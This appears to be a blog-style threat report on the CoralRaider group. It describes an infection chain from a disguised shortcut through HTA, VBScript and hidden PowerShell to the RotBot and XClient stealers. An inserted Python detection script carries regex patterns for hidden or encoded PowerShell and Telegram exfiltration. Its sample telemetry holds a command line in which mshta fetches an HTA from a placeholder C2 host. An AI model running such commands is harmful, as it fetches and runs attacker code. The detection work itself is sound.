There’s a new kid on the block among Vietnamese cyber criminals: CoralRaider. These attackers have targeted Asian organizations and brands with the aim of gaining access to social media account details and sensitive user data. CoralRaider’s specialty lies in seamless data extraction through legitimate services and social engineering tactics.

Vietnam and Its Close Ties With Cybercrimes!

2023 was a bad year for the Vietnamese people in terms of cybersecurity. In the first half of 2023 alone, 6000+ cyber attacks were registered within the country. Before 2023 ended, the total number of cyber attacks had reached a whopping 13,900 incidents.

As per the Vietnam National Cyber Security Technology Company, the country witnessed a spike of about 9.5% in cyber attacks in 2023. A total of 554 websites were attacked by threat actors, out of which around 212 belonged to Vietnamese government offices. The Vietnamese government is highly concerned about the sudden surge in cybercrime across the country and has declared it a direct threat to national security.

More On CoralRaider

CoralRaider made its first official appearance in 2023. Considered a newcomer, the cybercrime group has also drawn attention because of its rookie mistakes. For instance, on one occasion they ended up infecting their own systems, thereby exposing their schemes and pursuits.

CoralRaider’s ultimate goal in this latest campaign is monetary gain. They are trying hard to gain access to social media and advertising accounts so that they can enjoy illegitimate financial benefits. Cyber experts also suspect follow-on attacks in the form of malware delivery.

Unlike some other cyber criminals in Vietnam, CoralRaider does not appear to have a nationalist agenda. As of now, it is purely profit-driven.

Step-By-Step Analysis Of CoralRaider Infection Chain

  • The easiest way to identify a CoralRaider campaign is its Windows shortcut (.LNK) file, which is generally disguised with a PDF extension.
  • When an unsuspecting user clicks the supposedly harmless shortcut, it connects to a malicious server controlled by CoralRaider and downloads a further file.
  • This downloaded file is an HTML application (HTA) that looks like a harmless webpage. However, a script is hidden inside it; the attackers write these hidden scripts in Visual Basic.
  • The Visual Basic script then runs and instructs the computer to perform certain tasks. All of this happens behind the scenes, and the user stays oblivious.
  • Next, the Visual Basic script launches another set of instructions using PowerShell. Through these, the attackers check whether the computer is under the surveillance of security experts, probe any security software and try to bypass it to gain control of the system, and make sure the user receives no notification of the activity.
  • Finally, they execute a program named RotBot, designed to extract data stealthily from the computer without the user’s awareness. RotBot not only evades security measures but can also collect specific data according to its instructions.
  • RotBot quietly downloads a program called XClient, which collects sensitive private data such as passwords, usernames and email IDs from the device. The program can also steal credit card data, financial information and browser history, and it secretly takes screenshots of the victim’s desktop and uploads them too.

In short, it is like a private detective who sneaks into your home through the back door and leaves behind multiple spy cams to gather all your personal data.
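To make the chain above concrete from the defender’s side, here is an added detection example written for this article; it is not code from the article or from any vendor’s product. It assumes Sysmon-style process, file and network events, that the HTA stage runs through mshta.exe and launches PowerShell with window-hiding and policy-bypass switches, and that the Telegram channel described later on this page uses the Bot API host api.telegram.org. Those specifics are assumptions about how such a chain is typically logged, not details from the article, and every sample event below is constructed.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str    # command line as logged


@dataclass
class FileEvent:
    pid: int
    path: str       # file written to disk


@dataclass
class NetworkEvent:
    pid: int
    image: str      # process that opened the connection
    dest_host: str  # destination host name as logged


def basename(image: str) -> str:
    """Lower-cased file name of an executable path (Windows or POSIX separators)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Stage 1: a shortcut that borrows a document extension, e.g. Invoice.pdf.lnk
DOUBLE_EXT_LNK = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)\.lnk$", re.IGNORECASE)


def is_double_extension_lnk(path: str) -> bool:
    return DOUBLE_EXT_LNK.search(path) is not None


# Stage 2: mshta.exe running an HTA fetched over HTTP(S) instead of a local file
def is_remote_hta_launch(ev: ProcessEvent) -> bool:
    return (basename(ev.image) == "mshta.exe"
            and re.search(r"https?://", ev.cmdline, re.IGNORECASE) is not None)


# Stage 3: a script host spawning PowerShell with hidden-window / bypass / encoded flags
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
HIDDEN_PS = re.compile(
    r"-(?:w|windowstyle)\s+hidden|-(?:ep|executionpolicy)\s+bypass|-(?:e|ec|enc|encodedcommand)\s",
    re.IGNORECASE)


def is_hidden_powershell_from_script_host(ev: ProcessEvent, parent: Optional[ProcessEvent]) -> bool:
    if parent is None or basename(ev.image) != "powershell.exe":
        return False
    return basename(parent.image) in SCRIPT_HOSTS and HIDDEN_PS.search(ev.cmdline) is not None


# Stage 4 (assumption: Bot API host): Telegram API traffic from something that is
# neither a browser nor the desktop Telegram client
EXPECTED_TELEGRAM_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}


def is_unexpected_telegram_api(ev: NetworkEvent) -> bool:
    return (ev.dest_host.lower() == "api.telegram.org"
            and basename(ev.image) not in EXPECTED_TELEGRAM_CLIENTS)


def analyze(processes, files, network):
    """Run every rule over the telemetry; returns (rule_name, pid) pairs in detection order."""
    by_pid = {p.pid: p for p in processes}
    alerts = []
    for f in files:
        if is_double_extension_lnk(f.path):
            alerts.append(("double_extension_lnk", f.pid))
    for p in processes:
        if is_remote_hta_launch(p):
            alerts.append(("remote_hta_launch", p.pid))
        if is_hidden_powershell_from_script_host(p, by_pid.get(p.ppid)):
            alerts.append(("hidden_powershell_from_script_host", p.pid))
    for n in network:
        if is_unexpected_telegram_api(n):
            alerts.append(("unexpected_telegram_api", n.pid))
    return alerts


# Constructed sample telemetry in a Sysmon-like shape; not real captured data.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_FILES = [
    FileEvent(100, r"C:\Users\victim\Downloads\Invoice.pdf.lnk"),  # lure shortcut
    FileEvent(100, r"C:\Users\victim\Desktop\Report.lnk"),         # ordinary shortcut, benign
]
SAMPLE_PROCESSES = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(300, 100, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://c2.example.invalid/page.hta"),  # placeholder host
    ProcessEvent(400, 300, PS_PATH,
                 "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand AAAA"),
    ProcessEvent(500, 100, PS_PATH, "powershell.exe"),  # user-launched console, benign
]
SAMPLE_NETWORK = [
    NetworkEvent(400, PS_PATH, "api.telegram.org"),  # hidden PowerShell talking to Telegram
    NetworkEvent(600, r"C:\Users\victim\AppData\Roaming\Telegram Desktop\Telegram.exe",
                 "api.telegram.org"),                 # desktop client, benign
]

if __name__ == "__main__":
    for rule, pid in analyze(SAMPLE_PROCESSES, SAMPLE_FILES, SAMPLE_NETWORK):
        print(f"ALERT {rule} pid={pid}")
```

Each rule maps to one stage of the chain, and the benign control events (a plain `.lnk`, a user-opened PowerShell console, the real Telegram client) show what the rules must not fire on; in production the same parent-child and destination checks would be expressed as EDR or SIEM queries rather than Python.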

 


Noob Behavior By CoralRaider

CoralRaider generally uses Telegram both to exfiltrate victim data and as a command-and-control channel. Yet they somehow managed to infect one of their own systems, as screenshots of their own device screen turned up in Telegram itself.

The screenshots divulged plenty of detail, such as CoralRaider operators chatting in Vietnamese. Basically, CoralRaider extracts data from users’ systems and sells it in underground markets through various chat groups on Telegram.

Cyber Scenario in Vietnam

Earlier, Vietnam was not on the radar of cybercriminals. In recent times, however, the country has embraced rapid digital growth, and with it has become exposed to more and more cyber attacks. Poor economic conditions and a lack of job opportunities further push locals towards illegitimate activities: compared with skill-based jobs, cybercrime brings in a great deal of money in a short span of time, and that is what lures more and more people into the dark world of cybercrime.

At present, the relevant authorities are taking suitable measures to prevent further damage by CoralRaider. However, it is imperative to prioritize both phishing protection software and comprehensive phishing awareness training to fortify against future cyber threats.